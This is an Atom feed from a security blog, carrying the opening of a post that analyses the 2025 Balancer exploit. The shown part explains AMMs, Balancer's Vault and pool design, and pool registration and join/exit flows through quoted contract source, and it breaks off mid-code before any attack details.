<?xml version="1.0" encoding="utf-8"?>
<feed xmlns="http://www.w3.org/2005/Atom">
  <title>Kiprey&#39;s Blog</title>
  <icon>https://www.gravatar.com/avatar/e2da591d13645ac0fd960ab5cb2dede1</icon>
  
  <link href="https://kiprey.github.io/atom.xml" rel="self"/>
  
  <link href="https://kiprey.github.io/"/>
  <updated>2025-11-24T03:59:39.809Z</updated>
  <id>https://kiprey.github.io/</id>
  
  <author>
    <name>Kiprey</name>
    <email>Kiprey@qq.com</email>
  </author>
  
  <generator uri="https://hexo.io/">Hexo</generator>
  
  <entry>
    <title>Balancer 128M Exploit Analysis</title>
    <link href="https://kiprey.github.io/2025/11/balancer-128m-exploit-analysis/"/>
    <id>https://kiprey.github.io/2025/11/balancer-128m-exploit-analysis/</id>
    <published>2025-11-22T16:00:00.000Z</published>
    <updated>2025-11-24T03:59:39.809Z</updated>
    
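    <content type="html"><![CDATA[<div class="lang-switcher" style="text-align: center; margin: 20px 0;">  <button id="lang-zh" onclick="switchLang('zh')" style="padding: 8px 16px; margin: 0 5px; background: #007bff; color: white; border: none; border-radius: 4px; cursor: pointer;">中文</button>  <button id="lang-en" onclick="switchLang('en')" style="padding: 8px 16px; margin: 0 5px; background: #6c757d; color: white; border: none; border-radius: 4px; cursor: pointer;">English</button></div><div id="content-zh" class="lang-content lang-content-zh" style="display: block;"><h2 id="一、简介">I. Introduction</h2><p><strong>On November 3, 2025, an attacker exploited arithmetic precision loss in the Balancer pool invariant calculation and stole $128 million from six blockchain networks in under 30 minutes.</strong> I was very interested in this attack, but most existing write-ups cover only a narrow slice of the technical details, such as the precision loss in the _upscaleArray logic or one or two adjacent levels of the call chain, which is not friendly to readers who are not yet familiar with Balancer internals. So I wanted to lay out all the relevant details properly and take the opportunity to learn the Balancer protocol.</p><span id="more"></span><h2 id="二、Balancer-Internal">II. Balancer Internals</h2><p>In one sentence: Balancer is a DeFi liquidity pool framework built around an <strong>automated market maker (AMM)</strong>. If that sounds like it says nothing at all, don't worry; we will work through it step by step.</p><h3 id="1-什么是-AMM">1. What Is an AMM</h3><p>What is an automated market maker? Start with the market maker itself: <strong>a market maker is a role that provides liquidity</strong>. In stock trading, for example, a wide gap between the bid and the ask of an instrument hurts users, because they cannot trade at a suitable price and lose money to the spread. A market maker narrows that gap by placing orders on the order book at high frequency. If you have traded US equity options you will know this well: options tend to be illiquid by nature, so most of the liquidity on both sides of the book is provided by market makers.</p><p>Cryptocurrency swaps face a similar problem. A user who wants to trade a large amount of tokens needs a venue that can absorb the whole trade. The well-known Uniswap V2 is a classic example: it holds large reserves of TokenA/TokenB pairs and prices swaps by maintaining the invariant <code>x * y = k</code>. For example, suppose a Uniswap pool has k = 20,000 and currently holds 1000 USDC and 20 ETH; the ETH/USDC price is then 1000 / 20 = 50. If the reserves become 2000 USDC and 10 ETH (note that k is unchanged), the ETH/USDC price becomes 2000 / 10 = 200. In a venue like Uniswap the price changes automatically according to a mathematical formula, hence the name automated market maker. <strong>An automated market maker is a role that both adjusts prices automatically according to market conditions and provides enough token liquidity to satisfy trading demand</strong>.</p><h3 id="2-Balancer-组件">2. 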
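Balancer Components</h3><p>The <a href="https://docs-v2.balancer.fi/concepts/pools/">Balancer V2 documentation</a> describes Balancer as consisting of two main parts: the Vault and the Pools. One Vault serves many Pools, so when a user's operation involves trades across several tokens, only the Vault's internal accounting needs to change, which avoids repeated token transfers and lowers gas costs.</p><p><strong>Vault</strong></p><p>The Vault (pkg/vault/contracts/Vault.sol) is the core of Balancer. It <strong>holds</strong> and <strong>manages</strong> all the tokens of every Balancer pool, and it is the entry point for most Balancer operations (swaps / joins / exits). Note, however, that while the Vault holds the tokens and keeps the books, it does not implement the pool-specific fund logic (for example, maintaining the AMM invariant is not done in the Vault); that logic lives in the Pools.</p><p><strong>Pools</strong></p><p>Balancer has many pool types. Here are a few of the simpler or more commonly used ones:</p><ul><li><strong>Linear Pool</strong>: uses a known, stable exchange rate to swap between a base asset and its wrapped, yield-bearing counterpart. For example, on Aave, the stablecoin DAI and aDAI (the token received for depositing DAI into Aave, which represents the deposit and continuously accrues interest) can be swapped efficiently through a Linear Pool.</li><li><strong>Weighted Pool:</strong> an extension of the classic constant-product market-making model (x · y = k) popularized by Uniswap V1.</li><li><strong>Composable Stable Pools</strong>: pools designed for a set of assets whose values are highly correlated and that are expected to swap at close to 1:1 or at a known exchange rate. Examples are swaps between stablecoins such as USDC, USDT, and DAI, whose prices fluctuate very little and are therefore well suited to a low-slippage stable curve.</li></ul><p>For <strong>Composable Stable Pools</strong>, note that:</p><ol><li>The goal differs from that of a Linear Pool: a Composable Stable Pool handles swaps among "<strong>multiple stable assets of equivalent value</strong>", whereas a Linear Pool handles swaps between "<strong>a base asset and its yield-bearing token</strong>". Their mathematical structure and use cases differ significantly.</li><li>"Composable" means that the pool's BPT (Balancer Pool Token, the ERC20 share token that liquidity providers receive after depositing assets into the pool) <strong>can itself be used as a composable asset in building other pools</strong>. In other words, a pool's LP token can be nested into higher-level pools like any ordinary token, so pools can be freely combined and reference one another, together forming larger and more capital-efficient liquidity structures. A Linear Pool also registers its own BPT with the Vault, but that BPT may not be used as a composable asset for building other pools.</li></ol><h3 id="3-Balancer-交互流程">3. 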
Balancer Interaction Flows</h3><p>Here we use the Vault + Composable Stable Pool combination as an example to walk through some of Balancer's interaction flows.</p><p><strong>Creating a Composable Stable Pool contract</strong></p><p>First, let's look at how the Vault and a pool interact when a pool is created, and which state variables are involved:</p><ol><li><p>To create a new <strong>Composable Stable Pool</strong>, any user can call the create function of the ComposableStablePoolFactory contract (pkg/pool-stable/contracts/ComposableStablePoolFactory.sol), which creates a new ComposableStablePool contract.</p></li><li><p>The ComposableStablePool constructor then automatically calls vault.registerPool and vault.registerTokens to register the pool and its tokens with the Vault. Note that the registered tokens include not only the underlying assets specified at creation but also the pool address itself (because the pool contract is its own BPT).</p> <figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br></pre></td><td class="code"><pre><span 
class="line"><span class="comment">// pkg/pool-stable/contracts/ComposableStablePool.sol</span></span><br><span class="line"><span class="title function_">constructor</span>(<span class="params">NewPoolParams memory params</span>)</span><br><span class="line">    <span class="title class_">BasePool</span>(</span><br><span class="line">        params.<span class="property">vault</span>,</span><br><span class="line">        <span class="title class_">IVault</span>.<span class="property">PoolSpecialization</span>.<span class="property">GENERAL</span>,</span><br><span class="line">        params.<span class="property">name</span>,</span><br><span class="line">        params.<span class="property">symbol</span>,</span><br><span class="line">        <span class="title function_">_insertSorted</span>(params.<span class="property">tokens</span>, <span class="title class_">IERC20</span>(<span class="variable language_">this</span>)), <span class="comment">// &lt;------</span></span><br><span class="line">        <span class="keyword">new</span> address[](params.<span class="property">tokens</span>.<span class="property">length</span> + <span class="number">1</span>), <span class="comment">// &lt;------</span></span><br><span class="line">        params.<span class="property">swapFeePercentage</span>,</span><br><span class="line">        params.<span class="property">pauseWindowDuration</span>,</span><br><span class="line">        params.<span class="property">bufferPeriodDuration</span>,</span><br><span class="line">        params.<span class="property">owner</span></span><br><span class="line">    )</span><br><span class="line">    <span class="title class_">StablePoolAmplification</span>(params.<span class="property">amplificationParameter</span>)</span><br><span class="line">    <span class="title class_">ComposableStablePoolStorage</span>(<span class="title function_">_extractStorageParams</span>(params))</span><br><span class="line">    <span class="title 
class_">ComposableStablePoolRates</span>(<span class="title function_">_extractRatesParams</span>(params))</span><br><span class="line">    <span class="title class_">ProtocolFeeCache</span>(</span><br><span class="line">        params.<span class="property">protocolFeeProvider</span>,</span><br><span class="line">        <span class="title class_">ProviderFeeIDs</span>(&#123; <span class="attr">swap</span>: <span class="title class_">ProtocolFeeType</span>.<span class="property">SWAP</span>, <span class="attr">yield</span>: <span class="title class_">ProtocolFeeType</span>.<span class="property">YIELD</span>, <span class="attr">aum</span>: <span class="title class_">ProtocolFeeType</span>.<span class="property">AUM</span> &#125;)</span><br><span class="line">    )</span><br><span class="line">&#123;</span><br><span class="line">    _version = params.<span class="property">version</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">// pkg/pool-utils/contracts/lib/PoolRegistrationLib.sol</span></span><br><span class="line"><span class="keyword">function</span> <span class="title function_">_registerPool</span>(<span class="params"></span></span><br><span class="line"><span class="params">    IVault vault,</span></span><br><span class="line"><span class="params">    IVault.PoolSpecialization specialization,</span></span><br><span class="line"><span class="params">    IERC20[] memory tokens,</span></span><br><span class="line"><span class="params">    address[] memory assetManagers</span></span><br><span class="line"><span class="params"></span>) private <span class="title function_">returns</span> (bytes32) &#123;</span><br><span class="line">    bytes32 poolId = vault.<span class="title function_">registerPool</span>(specialization);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// We don&#x27;t need to check that tokens and assetManagers have the same 
length, since the Vault already performs</span></span><br><span class="line">    <span class="comment">// that check.</span></span><br><span class="line">    vault.<span class="title function_">registerTokens</span>(poolId, tokens, assetManagers);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> poolId;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>A quick note on <strong>PoolSpecialization</strong>: it determines which callback interface the Vault uses when it calls the pool for a swap, which in turn affects the pool's gas cost and the range of features it can support:</p><ul><li>General is the most flexible and suits pools that need access to all token balances and complex math.</li><li>Minimal Swap Info reduces the amount of callback data while keeping the functionality, and is commonly used by AMMs such as Weighted Pools that do not need the full state.</li><li>Two Token further restricts the pool to exactly two assets in exchange for the lowest swap gas cost.</li></ul><p>Each pool type picks the specialization that balances functionality and performance for the needs of its invariant calculation and its expected swap complexity. Every pool hard-codes its PoolSpecialization in the constructor; in ComposableStablePool it is set to <strong>GENERAL</strong>.</p></li><li><p>On the Vault side, these calls from the General Pool trigger some computation and state updates. First, in registerPool the Vault computes a unique pool ID for the pool and records it in the _isPoolRegistered mapping:</p> <figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// pkg/vault/contracts/PoolRegistry.sol</span></span><br><span 
class="line"><span class="keyword">function</span> <span class="title function_">registerPool</span>(<span class="params">PoolSpecialization specialization</span>)</span><br><span class="line">    external</span><br><span class="line">    override</span><br><span class="line">    nonReentrant</span><br><span class="line">    whenNotPaused</span><br><span class="line">    <span class="title function_">returns</span> (bytes32)</span><br><span class="line">&#123;</span><br><span class="line">    <span class="comment">// Each Pool is assigned a unique ID based on an incrementing nonce. This assumes there will never be more than</span></span><br><span class="line">    <span class="comment">// 2**80 Pools, and the nonce will not overflow.</span></span><br><span class="line"></span><br><span class="line">    bytes32 poolId = <span class="title function_">_toPoolId</span>(msg.<span class="property">sender</span>, specialization, <span class="title function_">uint80</span>(_nextPoolNonce));</span><br><span class="line"></span><br><span class="line">    <span class="title function_">_require</span>(!_isPoolRegistered[poolId], <span class="title class_">Errors</span>.<span class="property">INVALID_POOL_ID</span>); <span class="comment">// Should never happen as Pool IDs are unique.</span></span><br><span class="line">    _isPoolRegistered[poolId] = <span class="literal">true</span>;</span><br><span class="line"></span><br><span class="line">    _nextPoolNonce += <span class="number">1</span>;</span><br><span class="line"></span><br><span class="line">    <span class="comment">// Note that msg.sender is the pool&#x27;s contract</span></span><br><span class="line">    emit <span class="title class_">PoolRegistered</span>(poolId, msg.<span class="property">sender</span>, specialization);</span><br><span class="line">    <span class="keyword">return</span> poolId;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>Second, registerTokens sets 
<code>_poolAssetManagers</code> and <code>_generalPoolsBalances</code>. Both are mappings (state variables, not functions) keyed by <code>&lt;poolId, token&gt;</code>: the former stores the address of the manager that is allowed to deposit, withdraw, or update the balance of a given token in the pool, and the latter stores the <strong>balance state</strong> of a given token of the pool as tracked by the Vault. This confirms that it is the Vault that records how much of each token a pool holds, which also makes swaps convenient.</p> <figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// pkg/vault/contracts/PoolTokens.sol</span></span><br><span class="line"><span class="keyword">function</span> <span class="title function_">registerTokens</span>(<span class="params"></span></span><br><span class="line"><span class="params">    bytes32 
poolId,</span></span><br><span class="line"><span class="params">    IERC20[] memory tokens,</span></span><br><span class="line"><span class="params">    address[] memory assetManagers</span></span><br><span class="line"><span class="params"></span>) external override nonReentrant whenNotPaused <span class="title function_">onlyPool</span>(<span class="params">poolId</span>) &#123;</span><br><span class="line">    <span class="title class_">InputHelpers</span>.<span class="title function_">ensureInputLengthMatch</span>(tokens.<span class="property">length</span>, assetManagers.<span class="property">length</span>);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// Validates token addresses and assigns Asset Managers</span></span><br><span class="line">    <span class="keyword">for</span> (uint256 i = <span class="number">0</span>; i &lt; tokens.<span class="property">length</span>; ++i) &#123;</span><br><span class="line">        <span class="title class_">IERC20</span> token = tokens[i];</span><br><span class="line">        <span class="title function_">_require</span>(token != <span class="title class_">IERC20</span>(<span class="number">0</span>), <span class="title class_">Errors</span>.<span class="property">INVALID_TOKEN</span>);</span><br><span class="line"></span><br><span class="line">        _poolAssetManagers[poolId][token] = assetManagers[i];</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="title class_">PoolSpecialization</span> specialization = <span class="title function_">_getPoolSpecialization</span>(poolId);</span><br><span class="line">    <span class="keyword">if</span> (specialization == <span class="title class_">PoolSpecialization</span>.<span class="property">TWO_TOKEN</span>) &#123;</span><br><span class="line">        <span class="title function_">_require</span>(tokens.<span class="property">length</span> == <span 
class="number">2</span>, <span class="title class_">Errors</span>.<span class="property">TOKENS_LENGTH_MUST_BE_2</span>);</span><br><span class="line">        <span class="title function_">_registerTwoTokenPoolTokens</span>(poolId, tokens[<span class="number">0</span>], tokens[<span class="number">1</span>]);</span><br><span class="line">    &#125; <span class="keyword">else</span> <span class="keyword">if</span> (specialization == <span class="title class_">PoolSpecialization</span>.<span class="property">MINIMAL_SWAP_INFO</span>) &#123;</span><br><span class="line">        <span class="title function_">_registerMinimalSwapInfoPoolTokens</span>(poolId, tokens);</span><br><span class="line">    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">        <span class="comment">// PoolSpecialization.GENERAL</span></span><br><span class="line">        <span class="title function_">_registerGeneralPoolTokens</span>(poolId, tokens); <span class="comment">// &lt;-------</span></span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    emit <span class="title class_">TokensRegistered</span>(poolId, tokens, assetManagers);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">// pkg/vault/contracts/balances/GeneralPoolsBalance.sol</span></span><br><span class="line"><span class="keyword">function</span> <span class="title function_">_registerGeneralPoolTokens</span>(<span class="params">bytes32 poolId, IERC20[] memory tokens</span>) internal &#123;</span><br><span class="line">    <span class="title class_">EnumerableMap</span>.<span class="property">IERC20ToBytes32Map</span> storage poolBalances = _generalPoolsBalances[poolId];</span><br><span class="line"></span><br><span class="line">    <span class="keyword">for</span> (uint256 i = <span class="number">0</span>; i &lt; tokens.<span class="property">length</span>; ++i) &#123;</span><br><span 
class="line">        <span class="comment">// EnumerableMaps require an explicit initial value when creating a key-value pair: we use zero, the same</span></span><br><span class="line">        <span class="comment">// value that is found in uninitialized storage, which corresponds to an empty balance.</span></span><br><span class="line">        bool added = poolBalances.<span class="title function_">set</span>(tokens[i], <span class="number">0</span>);</span><br><span class="line">        <span class="title function_">_require</span>(added, <span class="title class_">Errors</span>.<span class="property">TOKEN_ALREADY_REGISTERED</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>This brings us to how <code>Pool Balances</code> are stored in the Vault. For each pool and token, <code>_generalPoolsBalances</code> stores the balance information as a single bytes32 that packs three fields:</p><ul><li><code>cash</code>, 112 bits: the amount of the token that the pool currently holds inside the Vault</li><li><code>managed</code>, 112 bits: the amount of the token that the pool's Asset Manager has withdrawn from the Vault and manages externally</li><li><code>lastChangeBlock</code>, 32 bits: the block number of the last balance change, used to guard against sandwich attacks</li></ul><p>The core purpose of this design is to let liquidity earn a higher return while the AMM keeps working normally. In the early Uniswap model, maintaining x·y = k meant locking the vast majority of the liquidity inside the contract, so it could not be invested externally and could not generate extra yield. Balancer's architecture instead allows an Asset Manager to move part of the funds out of the Vault for lending, investment, or other yield strategies. The pool's total balance is still <code>total = cash + managed</code>, but the managed part can be put to work flexibly to earn extra yield; the <code>cash</code> amount held in the Vault is updated only when events such as a swap, join, or exit occur. This preserves the usability of the AMM while improving overall capital efficiency.</p></li></ol><p><strong>Adding liquidity</strong></p><p>When a Liquidity Provider (LP) wants to add liquidity to a pool, the LP calls the joinPool function on the Vault. vault.joinPool calls the onJoinPool function of the specific pool (removing liquidity goes through vault.exitPool and pool.onExitPool respectively). The code of onJoinPool / onExitPool is shown below. These two functions are inherited by all pool types; <strong>each pool type implements its own _onInitializePool / _onJoinPool / _onExitPool hook functions to compute the amounts flowing in and out, but BPT minting and burning happen here</strong>:</p><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span 
class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span 
class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// pkg/pool-utils/contracts/BasePool.sol</span></span><br><span class="line"><span 
class="comment">/**</span></span><br><span class="line"><span class="comment"> * <span class="doctag">@notice</span> Vault hook for adding liquidity to a pool (including the first time, &quot;initializing&quot; the pool).</span></span><br><span class="line"><span class="comment"> * <span class="doctag">@dev</span> This function can only be called from the Vault, from `joinPool`.</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="keyword">function</span> <span class="title function_">onJoinPool</span>(<span class="params"></span></span><br><span class="line"><span class="params">    bytes32 poolId,</span></span><br><span class="line"><span class="params">    address sender,</span></span><br><span class="line"><span class="params">    address recipient,</span></span><br><span class="line"><span class="params">    uint256[] memory balances,</span></span><br><span class="line"><span class="params">    uint256 lastChangeBlock,</span></span><br><span class="line"><span class="params">    uint256 protocolSwapFeePercentage,</span></span><br><span class="line"><span class="params">    bytes memory userData</span></span><br><span class="line"><span class="params"></span>) external override <span class="title function_">onlyVault</span>(poolId) <span class="title function_">returns</span> (uint256[] memory, uint256[] memory) &#123;</span><br><span class="line">    <span class="title function_">_beforeSwapJoinExit</span>();</span><br><span class="line"></span><br><span class="line">    uint256[] memory scalingFactors = <span class="title function_">_scalingFactors</span>();</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (<span class="title function_">totalSupply</span>() == <span class="number">0</span>) &#123;</span><br><span class="line">        (uint256 bptAmountOut, uint256[] memory amountsIn) = <span class="title function_">_onInitializePool</span>(</span><br><span 
class="line">            poolId,</span><br><span class="line">            sender,</span><br><span class="line">            recipient,</span><br><span class="line">            scalingFactors,</span><br><span class="line">            userData</span><br><span class="line">        );</span><br><span class="line"></span><br><span class="line">        <span class="comment">// On initialization, we lock _getMinimumBpt() by minting it for the zero address. This BPT acts as a</span></span><br><span class="line">        <span class="comment">// minimum as it will never be burned, which reduces potential issues with rounding, and also prevents the</span></span><br><span class="line">        <span class="comment">// Pool from ever being fully drained.</span></span><br><span class="line">        <span class="title function_">_require</span>(bptAmountOut &gt;= <span class="title function_">_getMinimumBpt</span>(), <span class="title class_">Errors</span>.<span class="property">MINIMUM_BPT</span>);</span><br><span class="line">        <span class="title function_">_mintPoolTokens</span>(<span class="title function_">address</span>(<span class="number">0</span>), <span class="title function_">_getMinimumBpt</span>());</span><br><span class="line">        <span class="title function_">_mintPoolTokens</span>(recipient, bptAmountOut - <span class="title function_">_getMinimumBpt</span>());</span><br><span class="line"></span><br><span class="line">        <span class="comment">// amountsIn are amounts entering the Pool, so we round up.</span></span><br><span class="line">        <span class="title function_">_downscaleUpArray</span>(amountsIn, scalingFactors);</span><br><span class="line"></span><br><span class="line">        <span class="keyword">return</span> (amountsIn, <span class="keyword">new</span> uint256[](balances.<span class="property">length</span>));</span><br><span class="line">    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">        
<span class="title function_">_upscaleArray</span>(balances, scalingFactors);</span><br><span class="line">        (uint256 bptAmountOut, uint256[] memory amountsIn) = <span class="title function_">_onJoinPool</span>(</span><br><span class="line">            poolId,</span><br><span class="line">            sender,</span><br><span class="line">            recipient,</span><br><span class="line">            balances,</span><br><span class="line">            lastChangeBlock,</span><br><span class="line">            <span class="title function_">inRecoveryMode</span>() ? <span class="number">0</span> : protocolSwapFeePercentage, <span class="comment">// Protocol fees are disabled while in recovery mode</span></span><br><span class="line">            scalingFactors,</span><br><span class="line">            userData</span><br><span class="line">        );</span><br><span class="line"></span><br><span class="line">        <span class="comment">// Note we no longer use `balances` after calling `_onJoinPool`, which may mutate it.</span></span><br><span class="line"></span><br><span class="line">        <span class="title function_">_mintPoolTokens</span>(recipient, bptAmountOut);</span><br><span class="line"></span><br><span class="line">        <span class="comment">// amountsIn are amounts entering the Pool, so we round up.</span></span><br><span class="line">        <span class="title function_">_downscaleUpArray</span>(amountsIn, scalingFactors);</span><br><span class="line"></span><br><span class="line">        <span class="comment">// This Pool ignores the `dueProtocolFees` return value, so we simply return a zeroed-out array.</span></span><br><span class="line">        <span class="keyword">return</span> (amountsIn, <span class="keyword">new</span> uint256[](balances.<span class="property">length</span>));</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span 
class="comment">/**</span></span><br><span class="line"><span class="comment"> * <span class="doctag">@notice</span> Vault hook for removing liquidity from a pool.</span></span><br><span class="line"><span class="comment"> * <span class="doctag">@dev</span> This function can only be called from the Vault, from `exitPool`.</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="keyword">function</span> <span class="title function_">onExitPool</span>(<span class="params"></span></span><br><span class="line"><span class="params">    bytes32 poolId,</span></span><br><span class="line"><span class="params">    address sender,</span></span><br><span class="line"><span class="params">    address recipient,</span></span><br><span class="line"><span class="params">    uint256[] memory balances,</span></span><br><span class="line"><span class="params">    uint256 lastChangeBlock,</span></span><br><span class="line"><span class="params">    uint256 protocolSwapFeePercentage,</span></span><br><span class="line"><span class="params">    bytes memory userData</span></span><br><span class="line"><span class="params"></span>) external override <span class="title function_">onlyVault</span>(poolId) <span class="title function_">returns</span> (uint256[] memory, uint256[] memory) &#123;</span><br><span class="line">    uint256[] memory amountsOut;</span><br><span class="line">    uint256 bptAmountIn;</span><br><span class="line"></span><br><span class="line">    <span class="comment">// When a user calls `exitPool`, this is the first point of entry from the Vault.</span></span><br><span class="line">    <span class="comment">// We first check whether this is a Recovery Mode exit - if so, we proceed using this special lightweight exit</span></span><br><span class="line">    <span class="comment">// mechanism which avoids computing any complex values, interacting with external contracts, etc., and generally</span></span><br><span 
class="line">    <span class="comment">// should always work, even if the Pool&#x27;s mathematics or a dependency break down.</span></span><br><span class="line">    <span class="keyword">if</span> (userData.<span class="title function_">isRecoveryModeExitKind</span>()) &#123;</span><br><span class="line">        <span class="comment">// This exit kind is only available in Recovery Mode.</span></span><br><span class="line">        <span class="title function_">_ensureInRecoveryMode</span>();</span><br><span class="line"></span><br><span class="line">        <span class="comment">// Note that we don&#x27;t upscale balances nor downscale amountsOut - we don&#x27;t care about scaling factors during</span></span><br><span class="line">        <span class="comment">// a recovery mode exit.</span></span><br><span class="line">        (bptAmountIn, amountsOut) = <span class="title function_">_doRecoveryModeExit</span>(balances, <span class="title function_">totalSupply</span>(), userData);</span><br><span class="line">    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">        <span class="comment">// Note that we only call this if we&#x27;re not in a recovery mode exit.</span></span><br><span class="line">        <span class="title function_">_beforeSwapJoinExit</span>();</span><br><span class="line"></span><br><span class="line">        uint256[] memory scalingFactors = <span class="title function_">_scalingFactors</span>();</span><br><span class="line">        <span class="title function_">_upscaleArray</span>(balances, scalingFactors);</span><br><span class="line"></span><br><span class="line">        (bptAmountIn, amountsOut) = <span class="title function_">_onExitPool</span>(</span><br><span class="line">            poolId,</span><br><span class="line">            sender,</span><br><span class="line">            recipient,</span><br><span class="line">            balances,</span><br><span class="line">            
lastChangeBlock,</span><br><span class="line">            <span class="title function_">inRecoveryMode</span>() ? <span class="number">0</span> : protocolSwapFeePercentage, <span class="comment">// Protocol fees are disabled while in recovery mode</span></span><br><span class="line">            scalingFactors,</span><br><span class="line">            userData</span><br><span class="line">        );</span><br><span class="line"></span><br><span class="line">        <span class="comment">// amountsOut are amounts exiting the Pool, so we round down.</span></span><br><span class="line">        <span class="title function_">_downscaleDownArray</span>(amountsOut, scalingFactors);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="comment">// Note we no longer use `balances` after calling `_onExitPool`, which may mutate it.</span></span><br><span class="line"></span><br><span class="line">    <span class="title function_">_burnPoolTokens</span>(sender, bptAmountIn);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// This Pool ignores the `dueProtocolFees` return value, so we simply return a zeroed-out array.</span></span><br><span class="line">    <span class="keyword">return</span> (amountsOut, <span class="keyword">new</span> uint256[](balances.<span class="property">length</span>));</span><br><span 